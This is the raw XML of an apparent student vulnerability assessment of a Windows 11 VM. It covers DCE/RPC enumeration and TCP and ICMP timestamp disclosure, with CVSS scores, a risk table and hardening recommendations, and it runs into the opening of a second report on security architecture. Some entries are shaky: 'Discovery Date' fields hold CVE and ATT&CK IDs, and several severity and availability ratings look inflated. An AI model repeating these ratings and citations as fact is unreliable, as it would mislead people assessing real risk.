      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Discovery Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Documented under CVE-1999-0524.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Moderate impact on availability.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rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP Timestamp Replies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Windows 11)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Reveals system time for mapping and timing attacks.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Network mapping using ICMP in tools like Nmap.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Discovery Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Associated with MITRE ATT&amp;CK T1046.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Impact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Moderate impact on confidentiality and availability.</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ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>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5. Risk Assessment</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678"/>
        <w:gridCol w:w="1048"/>
        <w:gridCol w:w="1198"/>
        <w:gridCol w:w="1228"/>
        <w:gridCol w:w="1613"/>
        <w:gridCol w:w="1513"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="785"/>
        </w:trPr>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7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Vulnerability</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04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Severity</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1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Affected Systems</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Description</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CIA Impact</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5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Solution</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1340"/>
        </w:trPr>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7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DCE/RPC Enumeration</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04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Critical (CVSS Base Score = 9)</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1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Windows 11 VM</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Allows enumeration of services and users.</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Confidentiality (Exposes sensitive system data)</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5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Restrict DCE/RPC ports to internal networks.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1340"/>
        </w:trPr>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7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TCP Timestamp Information Disclosure</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04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Medium (CVSS Base Score = 6.8)</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1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Windows 11 VM, Linux</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Reveals system uptime.</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Availability (Reconnaissance enables downtime)</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5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Disable TCP timestamps in network settings.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1340"/>
        </w:trPr>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7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ICMP Timestamp Reply Information Disclosure</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04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Medium (CVSS Base Score = 5.5)</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1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Windows 11 VM</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Exposes system time via ICMP.</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6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Confidentiality, Availability</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="000000" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="000000" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="000000" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="151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Block ICMP timestamp requests at the firewall level.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Risk Severity Categories</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Critical:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Immediate action required to prevent exploitation.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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High:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Address promptly to reduce exposure.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Medium:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mitigate in planned updates.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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Calculation</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="240" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="720" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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DCE/RPC Enumeration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Base Score = 9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Critical).</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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TCP Timestamps: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Base Score = 6.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Medium).</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP Timestamps: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Base Score = 5.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Medium).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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">CIA Triad Analysis</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Confidentiality</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: High exposure in DCE/RPC enumeration and ICMP replies.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Integrity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Moderate risk with DCE/RPC.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Availability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Reconnaissance vulnerabilities reduce system availability.</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ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:b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6. Recommendations</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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DCE/RPC Enumeration</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Action:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Restrict access to DCE/RPC ports (e.g., 135, 137-139, 445).</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Reason:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prevent unauthorized enumeration of sensitive details.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Frameworks Referenced:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> NIST SP 800-53 (AC-6), MITRE ATT&amp;CK T1021.003.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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TCP Timestamps Information Disclosure</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Action:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Disable TCP timestamps (net.ipv4.tcp_timestamps = 0).</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Reason:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Minimize reconnaissance opportunities.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Frameworks Referenced:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-1999-0524, MITRE ATT&amp;CK T1040.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ICMP Timestamp Reply Information Disclosure</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Action:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Block ICMP timestamp requests using firewall rules.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Reason:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hinder network reconnaissance.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Frameworks Referenced:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> NIST SP 800-41 Rev. 1, CVE-2001-0001.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="141"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="40" w:before="240" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Policies</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Implement strict access controls and disable unused ports.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Conduct regular vulnerability scans and system audits.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Train employees on security awareness and incident reporting.</w:t>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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">7. References</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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National Institute of Standards and Technology. (2018). NIST SP 800-53 Rev. 5: Security and Privacy Controls for Information Systems. </w:t>
      </w:r>
      <w:hyperlink r:id="rId66" w:tooltip="https://nvlpubs.nist.gov/nistpubs" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvlpubs.nist.gov/nistpubs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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MITRE ATT&amp;CK Framework. (2021). </w:t>
      </w:r>
      <w:hyperlink r:id="rId67" w:tooltip="https://attack.mitre.org/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://attack.mitre.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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CVE-1999-0524. (1999). Common Vulnerabilities and Exposures. </w:t>
      </w:r>
      <w:hyperlink r:id="rId68" w:tooltip="https://nvd.nist.gov/vuln/detail/CVE-1999-0524" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvd.nist.gov/vuln/detail/CVE-1999-0524</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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EternalBlue Vulnerability (CVE-2017-0144). National Vulnerability Database. </w:t>
      </w:r>
      <w:hyperlink r:id="rId69" w:tooltip="https://nvd.nist.gov/vuln/detail/CVE-2017-0144" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvd.nist.gov/vuln/detail/CVE-2017-0144</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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CVE-2001-0001. (2001). Common Vulnerabilities and Exposures. </w:t>
      </w:r>
      <w:hyperlink r:id="rId70" w:tooltip="https://nvd.nist.gov/vuln/detail/CVE-2001-0001" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvd.nist.gov/vuln/detail/CVE-2001-0001</w:t>
        </w:r>
      </w:hyperlink>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8"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="420" w:line="367" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="33"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Architecture Recommendations Report</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b/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared for:</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[Mid-sized E-commerce Company Name]</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b/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared by:  Remilekun Fowosire</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January 6, 2025</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Executive Summary</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This report summarizes our findings after reviewing your company's network security. We found several weaknesses that need to be addressed to better protect your business and customers. We suggest a strong security plan based on the NIST Cybersecurity Fram</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ework </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="575b5f"/>
          <w:sz w:val="14"/>
          <w:highlight w:val="white"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, a widely recognized set of standards and best practices for managing cybersecurity risk. This plan includes improving how you protect your network, data, computers, and online store. We also suggest a step-by-step plan to put these changes in place, keep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ing in mind your budget and what's most important.</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1. Introduction</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As your business grows and evolves, so too must your approach to cybersecurity. A robust cybersecurity strategy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="575b5f"/>
          <w:sz w:val="14"/>
          <w:highlight w:val="white"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is essential for protecting your company's assets, maintaining customer trust, and ensuring business continuity. In this report, we outline a comprehensive security architecture designed to address the specific needs and challenges of your mid-sized e-com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
